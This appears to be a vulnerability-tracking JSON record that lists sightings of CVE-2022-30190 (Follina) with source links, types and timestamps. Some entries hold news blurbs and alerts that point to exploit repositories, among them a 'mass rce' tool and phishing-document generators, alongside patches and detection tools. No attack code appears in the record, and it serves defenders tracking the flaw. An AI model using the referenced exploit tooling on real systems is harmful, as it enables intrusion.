{"vulnerability": "cve-2022-30190", "sightings": [{"uuid": "910fefac-0270-4967-b84a-77a8f1858ccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/b7effe8d-f245-44fd-94ef-5f2f693cfb06", "content": "", "creation_timestamp": "2022-09-30T08:50:28.000000Z"}, {"uuid": "75760ae9-9019-4d3f-ab6d-99f2a7d38538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/c8255e2a-36b1-4d59-805a-aeb73aa8e929", "content": "", "creation_timestamp": "2022-06-21T18:38:00.000000Z"}, {"uuid": "35b78d10-3136-419d-91fd-41142c2125ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3410ad13-ef34-48c9-bc6f-b1b111a30e06", "content": "", "creation_timestamp": "2022-06-23T13:12:55.000000Z"}, {"uuid": "a0a2cf86-7566-40b6-9083-8ae8456f113c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/99138053-ae5d-4bcf-b2f8-0954edb204bc", "content": "", "creation_timestamp": "2022-11-01T20:54:34.000000Z"}, {"uuid": "6a32a493-934b-4714-96cf-b465b946c6b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "d1293f12-e28c-439d-ab8d-86b033275394", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/e7824ab3-14c8-4fc3-ada2-930b0487144c", "content": "", "creation_timestamp": "2022-06-21T06:36:06.000000Z"}, {"uuid": "22ae57ed-180a-4e4a-8366-690e3eec2413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "content": "", "creation_timestamp": "2022-05-30T05:00:00.000000Z"}, {"uuid": "5545302c-24ca-462d-a85f-1aa82f714bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/a67c65c39634310289635ecf99dea9a6", "content": "", "creation_timestamp": "2025-01-07T11:17:15.000000Z"}, {"uuid": "54cf600f-a2ec-44bf-bcf5-771251e358ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971663", "content": "", "creation_timestamp": "2024-12-24T20:32:30.507284Z"}, {"uuid": "ef5800b2-3d92-4ce1-b83d-dcad2c07ec0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/3a597fc9e98398f18b8f135687964a65", "content": "", "creation_timestamp": "2025-02-07T07:21:16.000000Z"}, {"uuid": "60b8af5e-ee6f-449c-88bf-00eddada910c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "7af661e6-b399-44a9-beb0-93369e25ffa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/redteamnews.bsky.social/post/3ll3dsf4wsv24", "content": "", "creation_timestamp": "2025-03-23T22:59:31.372080Z"}, {"uuid": "ce9eed15-48a5-4001-bd35-410849a6769b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/c8255e2a-36b1-4d59-805a-aeb73aa8e929", "content": "", "creation_timestamp": "2025-04-11T08:52:00.000000Z"}, {"uuid": "ca6f3b44-1a0e-41b3-9e5f-747256d94b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lleoqhxjgv2l", "content": "", "creation_timestamp": "2025-03-27T16:09:15.956404Z"}, {"uuid": "cab41f2f-ce32-4dfe-9850-7eb20122850e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:37.000000Z"}, {"uuid": "a250de35-b8e0-4cf0-b69d-e1437c8ad258", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:46.000000Z"}, {"uuid": "6f168bc1-30ed-4dfa-8519-5cb739eb4f86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-5160f4b6-f5bea135b10e56d0", "content": "", "creation_timestamp": "2025-06-11T13:05:26.587857Z"}, {"uuid": "d73f967d-a96e-4668-9b5e-6b38ff39f5d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/1f469f99675752c7ae1749a43429185d", "content": "", "creation_timestamp": "2025-04-27T13:33:59.000000Z"}, {"uuid": "cd1dc2eb-2db9-4275-971b-274cf7e9900f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/jos1264.social.skynetcloud.site.ap.brid.gy/post/3luo32nqinkl2", "content": "", "creation_timestamp": "2025-07-23T22:30:32.549661Z"}, {"uuid": "9e131209-76ee-43a8-8b1f-558691318df1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/356b6be98f75b1f7f00096fb3de09f7d", "content": "", "creation_timestamp": "2025-07-01T16:33:57.000000Z"}, {"uuid": "6993d5d8-8eeb-4aa1-b568-0db847976627", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/word_msdtjs_rce.rb", "content": "", "creation_timestamp": "2022-06-06T20:02:58.000000Z"}, {"uuid": "70b2a4c6-a351-404e-99ac-a555611cdbca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:00.000000Z"}, {"uuid": "9d218953-990b-4ee2-b83e-c5e65c89f4e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/7c1fa1521d76b91a66875cf22cc1dbf2", "content": "", "creation_timestamp": "2025-12-01T07:56:27.000000Z"}, {"uuid": "27803992-4c70-43e9-9ca0-9562f7930e1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/19e3f897ebc190a0d9fba1ddb254e07f", "content": "", "creation_timestamp": "2025-08-01T15:12:03.000000Z"}, {"uuid": "14d645c4-33bb-4fd4-9d86-3da7d09a4334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/ef4f79882a9a998824e5edb9a9c39d9f", "content": "", "creation_timestamp": "2025-10-31T22:18:16.000000Z"}, {"uuid": "e1d146b4-84ea-40f3-b6ec-7dbd68ee66ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2022-30190", "type": "seen", "source": "https://www.cert.at/de/warnungen/2022/5/remote-code-execution-schwachstelle-in-microsoft-windows-workarounds-verfugbar", "content": "", "creation_timestamp": "2022-05-31T13:31:13.000000Z"}, {"uuid": "74158ae8-b8f1-48e3-944b-210cd22dba18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/244584afa823b7a82f1fc04b52872393", "content": "", "creation_timestamp": "2025-10-01T19:45:44.000000Z"}, {"uuid": "443a3e46-fc7c-456a-819f-f0bc5b237d78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://sploitus.com/exploit?id=11EF8E6B-7CBD-5758-94E1-220BF0F529A7", "content": "", "creation_timestamp": "2025-10-18T09:43:12.000000Z"}, {"uuid": "edbd850f-ae8e-4cc0-9010-3cf4db43d7ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mgfs726gpy2b", "content": "", "creation_timestamp": "2026-03-06T17:03:59.589984Z"}, {"uuid": "42bc957c-ef3d-4c85-86f0-c71a3212cf79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/09dc4628be4c6acef1445113651a4bbd", "content": "", "creation_timestamp": "2025-09-01T15:01:42.000000Z"}, {"uuid": "1b051cc6-0648-43bf-9ac4-2ab83779ca0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/f0ea883416140b0333e5b1d33f3751c8", "content": "", "creation_timestamp": "2026-02-02T12:06:45.000000Z"}, {"uuid": "b65f93c7-1058-433a-bbf0-30d2d2d97881", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/ca50029f36cfd4b84b9f9e5785d4a904", "content": "", "creation_timestamp": "2026-03-04T12:43:32.000000Z"}, {"uuid": "0d42ede6-b532-47c1-8ff8-972f4ce71d41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/7956a2cb84c64f8278087c33a21a2617", "content": "", "creation_timestamp": "2026-01-03T10:10:27.000000Z"}, {"uuid": "96913d0b-6db9-4a0e-9d29-b289801b136a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=813", "content": "", "creation_timestamp": "2022-05-31T04:00:00.000000Z"}, {"uuid": "87d0fc62-7795-4ec7-ad01-93aa7f43051a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_10/2022", "content": "", "creation_timestamp": "2022-05-31T08:23:44.000000Z"}, {"uuid": "a5cb34a6-b197-4c4b-b7ab-4a2cd772b3f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "543d35ac-c3ee-4065-8904-ea4e9200e45d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=821", "content": "", "creation_timestamp": "2022-06-15T04:00:00.000000Z"}, {"uuid": "6c41a0bc-0594-42d0-9300-c1044f1fb2b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12319", "content": "Latest news and stories from BleepingComputer.com\nRussian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. [...]", "creation_timestamp": "2022-06-13T18:30:05.000000Z"}, {"uuid": "3eaa0b68-d3ed-4795-9b0e-6114e2c659ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/a24c34a5-ecd1-4d12-8e98-0503826daa06", "content": "", "creation_timestamp": "2026-02-02T12:27:20.086211Z"}, {"uuid": "36af6b22-081e-475e-b7e5-791b1395406e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2379", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities\nURL\uff1ahttps://github.com/Kesinger57/CVE-2022-30190-mass-rce\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T17:39:40.000000Z"}, {"uuid": "b15b3c84-ce2b-4af3-81ad-58d46b09991e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2372", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMitigates the \\\"Folina\\\"-ZeroDay (CVE-2022-30190)\nURL\uff1ahttps://github.com/derco0n/mitigate-folina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T09:38:03.000000Z"}, {"uuid": "25fb4c5d-bcb0-47a4-acb8-465cc1184bbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/23f2147b9bc46faaa2ed0d46e177aee6", "content": "", "creation_timestamp": "2026-04-03T14:42:52.000000Z"}, {"uuid": "472eb34a-9d79-4ffb-92b9-d79175325469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12317", "content": "Russian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. [...]\n\nhttps://www.bleepingcomputer.com/news/security/russian-hackers-start-targeting-ukraine-with-follina-exploits/", "creation_timestamp": "2022-06-13T18:29:49.000000Z"}, {"uuid": "7a492c1f-3f8a-43e1-933a-b9e426bd5945", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2326", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft Office Word Rce \u590d\u73b0(CVE-2022-30190)\nURL\uff1ahttps://github.com/bytecaps/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T13:19:45.000000Z"}, {"uuid": "0687f47a-3397-445d-90d9-4368ebcb319e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BleepingComputer/12587", "content": "XFiles info-stealing malware adds support for Follina delivery\n\nThe XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers. [...]\n\nhttps://www.bleepingcomputer.com/news/security/xfiles-info-stealing-malware-adds-support-for-follina-delivery/", "creation_timestamp": "2022-06-30T14:24:55.000000Z"}, {"uuid": "083e8663-9e75-4207-a5a0-05da1b0c1756", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2376", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThe CVE-2022-30190-follina Workarounds Patch\nURL\uff1ahttps://github.com/sentinelblue/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T14:35:29.000000Z"}, {"uuid": "0bd39e81-81e2-4a7a-ab26-37a8e1bbd4e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2375", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThe CVE-2022-30190-follina Workarounds Patch\nURL\uff1ahttps://github.com/suegdu/CVE-2022-30190-Follina-Patch\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T14:11:44.000000Z"}, {"uuid": "3a125ccd-3cef-4ae4-adf2-5b3251eecced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2374", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190-follina.py-\u4fee\u6539\u7248\uff0c\u53ef\u4ee5\u81ea\u5b9a\u4e49word\u6a21\u677f\uff0c\u65b9\u4fbf\u5b9e\u6218\u4e2d\u9493\u9c7c\u4f7f\u7528\u3002\nURL\uff1ahttps://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T12:46:47.000000Z"}, {"uuid": "c95b73b5-455b-4d97-8a7a-c143b195f464", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2446", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aD\u00e9sactivation du protocole MSDT URL (CVE-2022-30190) avec gestion des erreurs et de l'exit code pour un d\u00e9ploiement en masse\nURL\uff1ahttps://github.com/Rojacur/FollinaPatcherCLI\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-06T16:32:50.000000Z"}, {"uuid": "ecfeaff9-ee26-4832-85f2-5fb3af6fb7e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2462", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aServer to host/activate Follina payloads & generator of malicious Word documents exploiting the MS-MSDT protocol. (CVE-2022-30190)\nURL\uff1ahttps://github.com/dsibilio/follina-spring\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T22:51:50.000000Z"}, {"uuid": "30f9b6f9-9f8b-43e9-b57d-4571d29d5fa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2461", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aNotes related to CVE-2022-30190\nURL\uff1ahttps://github.com/abhirules27/Follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T21:29:39.000000Z"}, {"uuid": "03f9897c-f933-42dc-8f76-133fbc0a662e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2440", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft MS-MSDT Follina (0-day Vulnerability) CVE-2022-30190 PoC\nURL\uff1ahttps://github.com/IamVSM/msdt-follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-06T09:16:45.000000Z"}, {"uuid": "68df786d-4558-40ab-9822-a1173422d1c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2510", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aExtract payload URLs from Follina (CVE-2022-30190) docx and rtf files\nURL\uff1ahttps://github.com/MalwareTech/FollinaExtractor\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-15T02:38:56.000000Z"}, {"uuid": "822b980c-c09c-4af8-ae89-0e6885796550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2599", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 powerpoint version\nURL\uff1ahttps://github.com/Gra3s/CVE-2022-30190-PowerPoint\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-29T08:55:03.000000Z"}, {"uuid": "34f01424-d37a-4d40-80e9-9ede5e6b6226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9665", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Zero-Day: Exploit code for Microsoft Windows Support Diagnostic Tool RCE.\n\n\nhttps://github.com/NafisiAslH/KnowledgeSharing/tree/main/CyberSecurity/Web/CVEs/CVE-2022/CVE-2022-30190", "creation_timestamp": "2022-06-05T06:52:17.000000Z"}, {"uuid": "fc96a364-bae5-4f9d-ad55-fcbbfd73cec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/cKure/9750", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Follina patch CVE-2022-30190. (msdt.exe) is out.  \n\nhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190", "creation_timestamp": "2022-06-15T09:39:46.000000Z"}, {"uuid": "0068ef32-c718-4136-90b1-2966da7e7563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/5180856b-d3c5-4036-9201-94693724365c", "content": "", "creation_timestamp": "2026-04-19T22:25:34.000000Z"}, {"uuid": "d97ca475-1454-43c9-aa7e-7aa12dcdd889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2364", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMS-MSDT Follina CVE-2022-30190 PoC document generator\nURL\uff1ahttps://github.com/sudoaza/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T23:34:44.000000Z"}, {"uuid": "96c0da42-43e5-49c0-a889-53c98b2399a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 